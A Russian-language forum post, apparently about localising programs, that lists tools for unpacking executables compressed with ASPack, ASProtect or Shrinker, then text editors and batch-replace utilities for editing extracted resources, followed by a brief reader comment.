Программы для разжатия. Если ты определил, чем была сжата нужная вам программа, следует воспользоваться программой для разжатия именно этой версии этого сжимальщика. Лучше подобрать коллекцию побольше, на всякий случай.

ProcDump - Самая известная и глобальная программа. Анализатор и распаковщик, поддерживает кучу форматов, может пересобрать исполняемый файл. Единственная программа, у которой есть win интерфейс.

UN-PACK - анализатор и распаковщик. Поддерживает плагины. В качестве плагинов использует File Analyzer, EXESCAN, DISASM, IDArc.

UnASPack - для ASPack, Ashell.

CASPR - для ASPack и ASProtect.

DeShrink - для Shrinker.

rAD - для r!sc's Asprotect.

Теперь переходим к программам, помогающим в быту.

Aditor Pro. Многооконный текстовый редактор. Подсветка синтаксиса. Режим замены. Возможность поиска в файлах. Довольно быстро открывает большие текстовые файлы. Идеальный редактор для извлеченных ресурсов.

BK ReplaceEm. Программа для пакетного изменения текста в файлах. Вводите текст для поиска, текст для замены, указываете папку, и все ее содержимое меняется. Самое главное, что варианты поиска и замены можно сохранить. Таким образом, составив своеобразный словарь с самыми частыми словами, можно заменить половину извлеченных ресурсов.





Автор: dron Jan 8 2007, 19:31

крутые статьи тока читать некода